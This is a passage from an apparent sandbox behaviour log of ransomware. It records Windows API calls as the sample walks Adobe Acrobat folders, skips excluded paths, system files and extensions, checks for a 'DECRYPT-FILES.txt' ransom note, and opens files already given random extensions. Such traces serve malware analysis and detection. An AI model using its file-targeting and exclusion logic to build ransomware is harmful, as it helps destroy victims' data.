HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\All Users") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="AhnLab") returned 0x0 [0179.852] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.853] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0179.853] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.853] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\0a16c9.tmp") returned 85 [0179.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0179.856] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0179.856] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.856] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\DECRYPT-FILES.txt") returned 92 [0179.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.857] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0179.857] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0179.857] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee5338a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee5338a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0179.857] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.857] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda28e240, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee5338a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee5338a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.857] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.857] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.857] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee5338a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee5338a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee5338a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.857] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.857] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.857] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.857] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.857] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.857] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.857] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0179.857] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.857] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" [0179.857] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\0a16c9.tmp" [0179.857] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.858] CloseHandle (hObject=0x0) returned 0 [0179.858] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.858] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda8cdc00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda8cdc00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xa9fe1e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x161f, dwReserved0=0x0, dwReserved1=0x0, cFileName="addressbook.acrodata.TQRkiy8", cAlternateFileName="ADDRES~1.TQR")) returned 1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="DECRYPT-FILES.txt") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="autorun.inf") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="boot.ini") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="desktop.ini") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="ntuser.dat") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="iconcache.db") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="bootsect.bak") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="ntuser.dat.log") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="thumbs.db") returned -1 [0179.858] lstrcmpiW (lpString1="addressbook.acrodata.TQRkiy8", lpString2="Bootfont.bin") returned -1 [0179.858] lstrlenW (lpString="addressbook.acrodata.TQRkiy8") returned 28 [0179.858] lstrcmpiW (lpString1="TQRkiy8", lpString2="lnk") returned 1 [0179.858] lstrcmpiW (lpString1="TQRkiy8", lpString2="exe") returned 1 [0179.858] lstrcmpiW (lpString1="TQRkiy8", lpString2="sys") returned 1 [0179.859] lstrcmpiW (lpString1="TQRkiy8", lpString2="dll") returned 1 [0179.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned 74 [0179.859] lstrlenW (lpString="addressbook.acrodata.TQRkiy8") returned 28 [0179.859] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\" [0179.859] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="addressbook.acrodata.TQRkiy8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.TQRkiy8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.TQRkiy8" [0179.859] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.TQRkiy8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.tqrkiy8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0179.860] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=5663) returned 1 [0179.860] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0179.860] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.861] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.862] CloseHandle (hObject=0x288) returned 1 [0179.862] CloseHandle (hObject=0x284) returned 1 [0179.862] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.862] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa07a3c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa07a3c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLCache", cAlternateFileName="")) returned 1 [0179.862] lstrcmpW (lpString1="CRLCache", lpString2=".") returned 1 [0179.862] lstrcmpW (lpString1="CRLCache", lpString2="..") returned 1 [0179.862] lstrcatW (in: lpString1="CRLCache", lpString2="\\" | out: lpString1="CRLCache\\") returned="CRLCache\\" [0179.862] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\", lpString2="CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Program Files") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch=":\\Windows") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Games\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\All Users") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="AhnLab") returned 0x0 [0179.862] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.862] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0179.862] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.862] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\0a16c9.tmp") returned 94 [0179.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0179.866] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0179.866] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.866] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\DECRYPT-FILES.txt") returned 101 [0179.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.868] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0179.868] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0179.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee559a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee559a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0179.868] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.869] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda2b43a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee559a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee559a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.869] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.869] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.869] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee559a00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee559a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee559a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.869] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.869] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.869] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.869] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.869] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.869] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.869] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned 83 [0179.869] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.869] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\" [0179.869] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\0a16c9.tmp" [0179.869] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.870] CloseHandle (hObject=0x0) returned 0 [0179.870] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.870] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda5adf20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xda5adf20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa02e100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", cAlternateFileName="48B764~1.IZJ")) returned 1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="DECRYPT-FILES.txt") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="autorun.inf") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="boot.ini") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="desktop.ini") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="ntuser.dat") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="iconcache.db") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="bootsect.bak") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="ntuser.dat.log") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="thumbs.db") returned -1 [0179.870] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ", lpString2="Bootfont.bin") returned -1 [0179.870] lstrlenW (lpString="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.IZjmQ") returned 50 [0179.870] lstrcmpiW (lpString1="IZjmQ", lpString2="lnk") returned -1 [0179.870] lstrcmpiW (lpString1="IZjmQ", lpString2="exe") returned 1 [0179.870] lstrcmpiW (lpString1="IZjmQ", lpString2="sys") returned -1 [0179.870] lstrcmpiW 